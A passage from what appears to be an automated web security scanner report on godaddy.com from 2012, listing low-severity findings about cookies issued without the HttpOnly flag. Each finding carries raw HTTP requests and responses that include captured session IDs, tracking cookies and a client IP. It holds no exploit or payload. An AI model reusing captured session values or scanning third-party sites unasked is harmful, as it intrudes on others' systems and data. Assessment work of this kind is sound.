User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
Set-Cookie: ASP.NET_SessionId=rnjy2ferhnpoddivqs14a3i5; path=/; HttpOnly
X-AspNet-Version: 4.0.30319
Set-Cookie: ASP.NET_SessionId=rnjy2ferhnpoddivqs14a3i5; path=/; HttpOnly
Set-Cookie: preferences1=_sid=&dataCenterCode=US&gdshop_currencyType=USD; domain=godaddy.com; path=/
Set-Cookie: adc1=US; domain=godaddy.com; path=/
Set-Cookie: currency1=potableSourceStr=USD; domain=godaddy.com; expires=Tue, 05-Mar-2013 01:42:39 GMT; path=/
Set-Cookie: flag1=cflag=us; domain=godaddy.com; expires=Tue, 05-Mar-2013 01:42:39 GMT; path=/
Set-Cookie: currencypopin1=cdisplaypopin=false; domain=godaddy.com; expires=Tue, 05-Mar-2013 01:42:39 GMT; path=/
Set-Cookie: SplitValue1=82; domain=godaddy.com; expires=Tue, 06-Mar-2012 01:42:39 GMT; path=/
Set-Cookie: traffic=cookies=1&referrer=&sitename=www.godaddy.com&page=/charity/roundupforcharity.aspx&server=M1PWCORPWEB137&status=200 OK&querystring=&shopper=&privatelabelid=1&isc=&clientip=174.36.218.2&referringpath=&referringdomain=&split=82; domain=godaddy.com; path=/
Date: Mon, 05 Mar 2012 01:42:38 GMT
Connection: close
Content-Length: 87659


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><li
...[SNIP]...

4.38. http://www.godaddy.com/design/web-design.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.godaddy.com
Path:   /design/web-design.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /design/web-design.aspx HTTP/1.1
Host: www.godaddy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
Set-Cookie: ASP.NET_SessionId=vmb2mxth3yafuxmcqzduelbs; path=/; HttpOnly
X-AspNet-Version: 4.0.30319
Set-Cookie: ASP.NET_SessionId=vmb2mxth3yafuxmcqzduelbs; path=/; HttpOnly
Set-Cookie: preferences1=_sid=&dataCenterCode=US&gdshop_currencyType=USD; domain=godaddy.com; path=/
Set-Cookie: adc1=US; domain=godaddy.com; path=/
Set-Cookie: currency1=potableSourceStr=USD; domain=godaddy.com; expires=Tue, 05-Mar-2013 01:59:38 GMT; path=/
Set-Cookie: flag1=cflag=us; domain=godaddy.com; expires=Tue, 05-Mar-2013 01:59:38 GMT; path=/
Set-Cookie: currencypopin1=cdisplaypopin=false; domain=godaddy.com; expires=Tue, 05-Mar-2013 01:59:38 GMT; path=/
Set-Cookie: SplitValue1=51; domain=godaddy.com; expires=Tue, 06-Mar-2012 01:59:38 GMT; path=/
Set-Cookie: traffic=cookies=1&referrer=&sitename=www.godaddy.com&page=/design/web-design.aspx&server=M1PWCORPWEB137&status=200 OK&querystring=&shopper=&privatelabelid=1&isc=&clientip=174.36.218.2&referringpath=&referringdomain=&split=51; domain=godaddy.com; path=/
Date: Mon, 05 Mar 2012 01:59:38 GMT
Connection: close
Content-Length: 132017


<!DOCTYPE html>

<html>
<head id="ctl00_Head1"><link rel="Stylesheet" type="text/css" href="http://img2.wsimg.com/shared/css/1/styles_20120113.min.css" />
<title>Web Design | Professionally
...[SNIP]...

4.39. http://www.godaddy.com/domainaddon/domain-alert.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.godaddy.com
Path:   /domainaddon/domain-alert.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /domainaddon/domain-alert.aspx HTTP/1.1
Host: www.godaddy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Cache-Control: private
Content-Type: text/html
Location: http://www.godaddy.com/domainaddon/domain-backorders.aspx
Server: Microsoft-IIS/7.5
Set-Cookie: ASP.NET_SessionId=c2g4adgxg1jpivq3ggygdvpk; path=/; HttpOnly
X-AspNet-Version: 4.0.30319
Set-Cookie: ASP.NET_SessionId=c2g4adgxg1jpivq3ggygdvpk; path=/; HttpOnly
Set-Cookie: preferences1=_sid=&dataCenterCode=US; domain=godaddy.com; path=/
Set-Cookie: adc1=US; domain=godaddy.com; path=/
Date: Mon, 05 Mar 2012 01:59:35 GMT
Connection: close
Content-Length: 0


4.40. http://www.godaddy.com/domains/actions/json/adddomaintopending.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.godaddy.com
Path:   /domains/actions/json/adddomaintopending.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

POST /domains/actions/json/adddomaintopending.aspx?&TargetDivID=x HTTP/1.1
Host: www.godaddy.com
Proxy-Connection: keep-alive
Content-Length: 72
Origin: http://www.godaddy.com
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.56 Safari/535.11
Content-Type: application/x-www-form-urlencoded
Accept: application/json, text/javascript, */*; q=0.01
Referer: http://www.godaddy.com/domains/searchresults.aspx?ci=44919
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=ws5jw4vh5tuzq2dphfi4us5a; preferences1=_sid=&dataCenterCode=US&gdshop_currencyType=USD; SplitValue1=75; flag1=cflag=us; currencypopin1=cdisplaypopin=false; GoogleADServicesgoogleadwordshome=zbnczeofsfcgdhzeqcxgcadeafyilatc; pathway=221039fb-1ef3-4a9c-9888-ebefb84fcda3; HPBackground=Danica2; fbiTrafficSettings=cDepth=16&resX=1920&resY=1200&fMajorVer=-1&fMinorVer=-1&slMajorVer=-1&slMinorVer=-1; pagecount=3; actioncount=; app_pathway=; visitor=vid=221039fb-1ef3-4a9c-9888-ebefb84fcda3; adc1=US; currency1=potableSourceStr=USD; traffic=cookies=1&referrer=http://www.godaddy.com/domains/searchresults.aspx?ci=44919&sitename=www.godaddy.com&page=/domains/searchresults.aspx&server=M1PWCORPWEB137&status=200 OK&querystring=ci=44919%26hpGoogleStatic%3d1&shopper=&privatelabelid=1&isc=&clientip=174.36.218.2&referringpath=221039fb-1ef3-4a9c-9888-ebefb84fcda3&referringdomain=&split=75

token=4E3RF34WEDE4.CA%7Cavailable%7Cstripmall%7C7%7C-8588706958203452059

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: application/json; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: MemPDC1=kekhbitfhchhydcgrcdjhfaeyjshkcwf; domain=godaddy.com; path=/
Set-Cookie: MemPDCLoc1=net; domain=godaddy.com; path=/
Set-Cookie: traffic=cookies=1&referrer=http://www.godaddy.com/domains/searchresults.aspx?ci=44919&sitename=www.godaddy.com&page=/domains/actions/json/adddomaintopending.aspx&server=M1PWCORPWEB137&status=200 OK&querystring=TargetDivID=x%26hpGoogleStatic%3d1&shopper=&privatelabelid=1&isc=&clientip=174.36.218.2&referringpath=221039fb-1ef3-4a9c-9888-ebefb84fcda3&referringdomain=&split=75; domain=godaddy.com; path=/
Date: Mon, 05 Mar 2012 01:32:12 GMT
Content-Length: 18

{"Success":"True"}

4.41. http://www.godaddy.com/domains/bulk-domain-transfer.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.godaddy.com
Path:   /domains/bulk-domain-transfer.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /domains/bulk-domain-transfer.aspx HTTP/1.1
Host: www.godaddy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
Set-Cookie: ASP.NET_SessionId=gigli1t4hd4patc250rutslm; path=/; HttpOnly
X-AspNet-Version: 4.0.30319
Set-Cookie: ASP.NET_SessionId=gigli1t4hd4patc250rutslm; path=/; HttpOnly
Set-Cookie: preferences1=_sid=&dataCenterCode=US&gdshop_currencyType=USD; domain=godaddy.com; path=/
Set-Cookie: adc1=US; domain=godaddy.com; path=/
Set-Cookie: currency1=potableSourceStr=USD; domain=godaddy.com; expires=Tue, 05-Mar-2013 01:58:40 GMT; path=/
Set-Cookie: flag1=cflag=us; domain=godaddy.com; expires=Tue, 05-Mar-2013 01:58:40 GMT; path=/
Set-Cookie: currencypopin1=cdisplaypopin=false; domain=godaddy.com; expires=Tue, 05-Mar-2013 01:58:40 GMT; path=/
Set-Cookie: SplitValue1=89; domain=godaddy.com; expires=Tue, 06-Mar-2012 01:58:40 GMT; path=/
Set-Cookie: traffic=cookies=1&referrer=&sitename=www.godaddy.com&page=/domains/bulk-domain-transfer.aspx&server=M1PWCORPWEB137&status=200 OK&querystring=&shopper=&privatelabelid=1&isc=&clientip=174.36.218.2&referringpath=&referringdomain=&split=89; domain=godaddy.com; path=/
Set-Cookie: GoogleADServicesgoogleadwordssearch=yizaehuaxfkclacevbrcsbdjtcdfrayi; domain=godaddy.com; expires=Sat, 05-Mar-2022 01:58:40 GMT; path=/
Set-Cookie: BlueLithium_domainsearch=yizaehuaxfkclacevbrcsbdjtcdfrayi; domain=godaddy.com; path=/
Date: Mon, 05 Mar 2012 01:58:39 GMT
Connection: close
Content-Length: 148315


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1">
<
...[SNIP]...

4.42. http://www.godaddy.com/domains/controls/jsoncontent/pendingproductssummary.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.godaddy.com
Path:   /domains/controls/jsoncontent/pendingproductssummary.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /domains/controls/jsoncontent/pendingproductssummary.aspx?refresh=true&TargetDivId=pending_products_container&ShowCartIcon=true&SummaryTitle=Order%20Summary&scb=1&sbm=1&_=1330911078528 HTTP/1.1
Host: www.godaddy.com
Proxy-Connection: keep-alive
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.56 Safari/535.11
Accept: application/json, text/javascript, */*; q=0.01
Referer: http://www.godaddy.com/domains/searchresults.aspx?ci=44919
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=ws5jw4vh5tuzq2dphfi4us5a; preferences1=_sid=&dataCenterCode=US&gdshop_currencyType=USD; SplitValue1=75; flag1=cflag=us; currencypopin1=cdisplaypopin=false; GoogleADServicesgoogleadwordshome=zbnczeofsfcgdhzeqcxgcadeafyilatc; pathway=221039fb-1ef3-4a9c-9888-ebefb84fcda3; HPBackground=Danica2; fbiTrafficSettings=cDepth=16&resX=1920&resY=1200&fMajorVer=-1&fMinorVer=-1&slMajorVer=-1&slMinorVer=-1; pagecount=3; actioncount=; app_pathway=; visitor=vid=221039fb-1ef3-4a9c-9888-ebefb84fcda3; adc1=US; currency1=potableSourceStr=USD; MemPDC1=xdxhndbhhbniabycyehggijiggabmemj; MemPDCLoc1=net; traffic=cookies=1&referrer=http://www.godaddy.com/domains/searchresults.aspx?ci=44919&sitename=www.godaddy.com&page=/domains/actions/json/adddomaintopending.aspx&server=M1PWCORPWEB137&status=200 OK&querystring=TargetDivID=x%26hpGoogleStatic%3d1&shopper=&privatelabelid=1&isc=&clientip=174.36.218.2&referringpath=221039fb-1ef3-4a9c-9888-ebefb84fcda3&referringdomain=&split=75

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: application/json; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: traffic=cookies=1&referrer=http://www.godaddy.com/domains/searchresults.aspx?ci=44919&sitename=www.godaddy.com&page=/domains/controls/jsoncontent/pendingproductssummary.aspx&server=M1PWCORPWEB137&status=200 OK&querystring=refresh=true&TargetDivId=pending_products_container&ShowCartIcon=true&SummaryTitle=Order+Summary&scb=1&sbm=1&_=1330911078528%26hpGoogleStatic%3d1&shopper=&privatelabelid=1&isc=&clientip=174.36.218.2&referringpath=221039fb-1ef3-4a9c-9888-ebefb84fcda3&referringdomain=&split=75; domain=godaddy.com; path=/
Date: Mon, 05 Mar 2012 01:32:17 GMT
Content-Length: 6238

{"Html":"\r\n \r\n\u003cscript type=\"text/javascript\"\u003e\r\nvar pp_showCartIcon = true;\r\nvar pp_showContinueButton = true;\r\nvar pp_showBulkMessage = true;\r\nvar pp_contentDiv = \"pending_pr
...[SNIP]...

4.43. http://www.godaddy.com/domains/controls/resultspricechartbulk.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.godaddy.com
Path:   /domains/controls/resultspricechartbulk.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /domains/controls/resultspricechartbulk.aspx HTTP/1.1
Host: www.godaddy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
Set-Cookie: ASP.NET_SessionId=a12ueo40vukgan2b4asbwam5; path=/; HttpOnly
X-AspNet-Version: 4.0.30319
Set-Cookie: ASP.NET_SessionId=a12ueo40vukgan2b4asbwam5; path=/; HttpOnly
Set-Cookie: SplitValue1=77; domain=godaddy.com; expires=Tue, 06-Mar-2012 01:40:49 GMT; path=/
Set-Cookie: traffic=cookies=1&referrer=&sitename=www.godaddy.com&page=/domains/controls/resultspricechartbulk.aspx&server=M1PWCORPWEB137&status=200 OK&querystring=&shopper=&privatelabelid=1&isc=&clientip=174.36.218.2&referringpath=&referringdomain=&split=77; domain=godaddy.com; path=/
Set-Cookie: preferences1=_sid=; domain=godaddy.com; path=/
Date: Mon, 05 Mar 2012 01:40:49 GMT
Connection: close
Content-Length: 12717


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><link r
...[SNIP]...

4.44. http://www.godaddy.com/domains/customize.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.godaddy.com
Path:   /domains/customize.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /domains/customize.aspx?ci=14641 HTTP/1.1
Host: www.godaddy.com
Proxy-Connection: keep-alive
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.56 Safari/535.11
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.godaddy.com/domains/searchresults.aspx?ci=44919
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=ws5jw4vh5tuzq2dphfi4us5a; preferences1=_sid=&dataCenterCode=US&gdshop_currencyType=USD; SplitValue1=75; flag1=cflag=us; currencypopin1=cdisplaypopin=false; GoogleADServicesgoogleadwordshome=zbnczeofsfcgdhzeqcxgcadeafyilatc; pathway=221039fb-1ef3-4a9c-9888-ebefb84fcda3; HPBackground=Danica2; pagecount=4; actioncount=; app_pathway=; visitor=vid=221039fb-1ef3-4a9c-9888-ebefb84fcda3; traffic=; fbiTrafficSettings=cDepth=16&resX=1920&resY=1200&fMinorVer=1&fMajorVer=11&slMajorVer=-1&slMinorVer=-1; adc1=US; currency1=potableSourceStr=USD; MemPDC1=ljrecdtffbugaahgraqdyjybtizayfne; MemPDCLoc1=net

Response

HTTP/1.1 302 Found
Cache-Control: private
Content-Type: text/html; charset=utf-8
Location: https://www.godaddy.com/domains/customize.aspx?ci=14641
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: adc1=US; domain=godaddy.com; path=/
Set-Cookie: currency1=potableSourceStr=USD; domain=godaddy.com; expires=Tue, 05-Mar-2013 01:32:33 GMT; path=/
Date: Mon, 05 Mar 2012 01:32:33 GMT
Content-Length: 172

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="https://www.godaddy.com/domains/customize.aspx?ci=14641">here</a>.</h2>
</body></html>

4.45. http://www.godaddy.com/domains/domain-broker.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.godaddy.com
Path:   /domains/domain-broker.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /domains/domain-broker.aspx?isc=smfbfos HTTP/1.1
Host: www.godaddy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
Set-Cookie: ASP.NET_SessionId=fm3k1sbrbcvo4nvttu1ph5yy; path=/; HttpOnly
X-AspNet-Version: 4.0.30319
Set-Cookie: ASP.NET_SessionId=fm3k1sbrbcvo4nvttu1ph5yy; path=/; HttpOnly
Set-Cookie: preferences1=_sid=&dataCenterCode=US&gdshop_currencyType=USD; domain=godaddy.com; path=/
Set-Cookie: adc1=US; domain=godaddy.com; path=/
Set-Cookie: currency1=potableSourceStr=USD; domain=godaddy.com; expires=Tue, 05-Mar-2013 01:58:41 GMT; path=/
Set-Cookie: flag1=cflag=us; domain=godaddy.com; expires=Tue, 05-Mar-2013 01:58:41 GMT; path=/
Set-Cookie: currencypopin1=cdisplaypopin=false; domain=godaddy.com; expires=Tue, 05-Mar-2013 01:58:41 GMT; path=/
Set-Cookie: SplitValue1=62; domain=godaddy.com; expires=Tue, 06-Mar-2012 01:58:41 GMT; path=/
Set-Cookie: traffic=cookies=1&referrer=&sitename=www.godaddy.com&page=/domains/domain-broker.aspx&server=M1PWCORPWEB137&status=200 OK&querystring=isc=smfbfos&shopper=&privatelabelid=1&isc=smfbfos&clientip=174.36.218.2&referringpath=&referringdomain=&split=62; domain=godaddy.com; path=/
Date: Mon, 05 Mar 2012 01:58:40 GMT
Connection: close
Content-Length: 94537


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><li
...[SNIP]...

4.46. http://www.godaddy.com/domains/domain-broker.aspx/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.godaddy.com
Path:   /domains/domain-broker.aspx/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /domains/domain-broker.aspx/ HTTP/1.1
Host: www.godaddy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
Set-Cookie: ASP.NET_SessionId=cmvdqsv45cvoeuzdhmnfwyki; path=/; HttpOnly
X-AspNet-Version: 4.0.30319
Set-Cookie: ASP.NET_SessionId=cmvdqsv45cvoeuzdhmnfwyki; path=/; HttpOnly
Set-Cookie: preferences1=_sid=&dataCenterCode=US&gdshop_currencyType=USD; domain=godaddy.com; path=/
Set-Cookie: adc1=US; domain=godaddy.com; path=/
Set-Cookie: currency1=potableSourceStr=USD; domain=godaddy.com; expires=Tue, 05-Mar-2013 01:58:47 GMT; path=/
Set-Cookie: flag1=cflag=us; domain=godaddy.com; expires=Tue, 05-Mar-2013 01:58:47 GMT; path=/
Set-Cookie: currencypopin1=cdisplaypopin=false; domain=godaddy.com; expires=Tue, 05-Mar-2013 01:58:47 GMT; path=/
Set-Cookie: SplitValue1=13; domain=godaddy.com; expires=Tue, 06-Mar-2012 01:58:47 GMT; path=/
Set-Cookie: traffic=cookies=1&referrer=&sitename=www.godaddy.com&page=/domains/domain-broker.aspx/&server=M1PWCORPWEB137&status=200 OK&querystring=&shopper=&privatelabelid=1&isc=&clientip=174.36.218.2&referringpath=&referringdomain=&split=13; domain=godaddy.com; path=/
Date: Mon, 05 Mar 2012 01:58:46 GMT
Connection: close
Content-Length: 92156


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><li
...[SNIP]...

4.47. http://www.godaddy.com/domains/domain-transfer.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.godaddy.com
Path:   /domains/domain-transfer.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /domains/domain-transfer.aspx HTTP/1.1
Host: www.godaddy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
Set-Cookie: ASP.NET_SessionId=mweiviwhknw5sfidae0bx2jd; path=/; HttpOnly
X-AspNet-Version: 4.0.30319
Set-Cookie: ASP.NET_SessionId=mweiviwhknw5sfidae0bx2jd; path=/; HttpOnly
Set-Cookie: preferences1=_sid=&dataCenterCode=US&gdshop_currencyType=USD; domain=godaddy.com; path=/
Set-Cookie: adc1=US; domain=godaddy.com; path=/
Set-Cookie: currency1=potableSourceStr=USD; domain=godaddy.com; expires=Tue, 05-Mar-2013 01:40:16 GMT; path=/
Set-Cookie: flag1=cflag=us; domain=godaddy.com; expires=Tue, 05-Mar-2013 01:40:16 GMT; path=/
Set-Cookie: currencypopin1=cdisplaypopin=false; domain=godaddy.com; expires=Tue, 05-Mar-2013 01:40:16 GMT; path=/
Set-Cookie: SplitValue1=87; domain=godaddy.com; expires=Tue, 06-Mar-2012 01:40:16 GMT; path=/
Set-Cookie: traffic=cookies=1&referrer=&sitename=www.godaddy.com&page=/domains/domain-transfer.aspx&server=M1PWCORPWEB137&status=200 OK&querystring=&shopper=&privatelabelid=1&isc=&clientip=174.36.218.2&referringpath=&referringdomain=&split=87; domain=godaddy.com; path=/
Set-Cookie: GoogleADServicesgoogleadwordssearch=ncedoibgaelhqihghdaeygihbegcujfi; domain=godaddy.com; expires=Sat, 05-Mar-2022 01:40:16 GMT; path=/
Set-Cookie: BlueLithium_domainsearch=ncedoibgaelhqihghdaeygihbegcujfi; domain=godaddy.com; path=/
Date: Mon, 05 Mar 2012 01:40:16 GMT
Connection: close
Content-Length: 164185


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1">
<
...[SNIP]...

4.48. http://www.godaddy.com/domains/domain_offer.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.godaddy.com
Path:   /domains/domain_offer.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /domains/domain_offer.aspx HTTP/1.1
Host: www.godaddy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
Set-Cookie: ASP.NET_SessionId=t13p2jid5l11apxxupclb1gk; path=/; HttpOnly
X-AspNet-Version: 4.0.30319
Set-Cookie: ASP.NET_SessionId=t13p2jid5l11apxxupclb1gk; path=/; HttpOnly
Set-Cookie: preferences1=_sid=&dataCenterCode=US&gdshop_currencyType=USD; domain=godaddy.com; path=/
Set-Cookie: adc1=US; domain=godaddy.com; path=/
Set-Cookie: currency1=potableSourceStr=USD; domain=godaddy.com; expires=Tue, 05-Mar-2013 01:58:45 GMT; path=/
Set-Cookie: flag1=cflag=us; domain=godaddy.com; expires=Tue, 05-Mar-2013 01:58:45 GMT; path=/
Set-Cookie: currencypopin1=cdisplaypopin=false; domain=godaddy.com; expires=Tue, 05-Mar-2013 01:58:45 GMT; path=/
Set-Cookie: SplitValue1=86; domain=godaddy.com; expires=Tue, 06-Mar-2012 01:58:45 GMT; path=/
Set-Cookie: traffic=cookies=1&referrer=&sitename=www.godaddy.com&page=/domains/domain_offer.aspx&server=M1PWCORPWEB137&status=200 OK&querystring=&shopper=&privatelabelid=1&isc=&clientip=174.36.218.2&referringpath=&referringdomain=&split=86; domain=godaddy.com; path=/
Date: Mon, 05 Mar 2012 01:58:45 GMT
Connection: close
Content-Length: 108037


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><li
...[SNIP]...

4.49. http://www.godaddy.com/domains/popups/chart.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.godaddy.com
Path:   /domains/popups/chart.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /domains/popups/chart.aspx HTTP/1.1
Host: www.godaddy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
Set-Cookie: ASP.NET_SessionId=1vkeyrbm1xfd1znl2tiaam34; path=/; HttpOnly
X-AspNet-Version: 4.0.30319
Set-Cookie: ASP.NET_SessionId=1vkeyrbm1xfd1znl2tiaam34; path=/; HttpOnly
Set-Cookie: preferences1=_sid=; domain=godaddy.com; path=/
Set-Cookie: SplitValue1=70; domain=godaddy.com; expires=Tue, 06-Mar-2012 01:40:24 GMT; path=/
Set-Cookie: traffic=cookies=1&referrer=&sitename=www.godaddy.com&page=/domains/popups/chart.aspx&server=M1PWCORPWEB137&status=200 OK&querystring=&shopper=&privatelabelid=1&isc=&clientip=174.36.218.2&referringpath=&referringdomain=&split=70; domain=godaddy.com; path=/
Date: Mon, 05 Mar 2012 01:40:23 GMT
Connection: close
Content-Length: 131785


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><link r
...[SNIP]...

4.50. http://www.godaddy.com/domains/search.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.godaddy.com
Path:   /domains/search.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /domains/search.aspx HTTP/1.1
Host: www.godaddy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
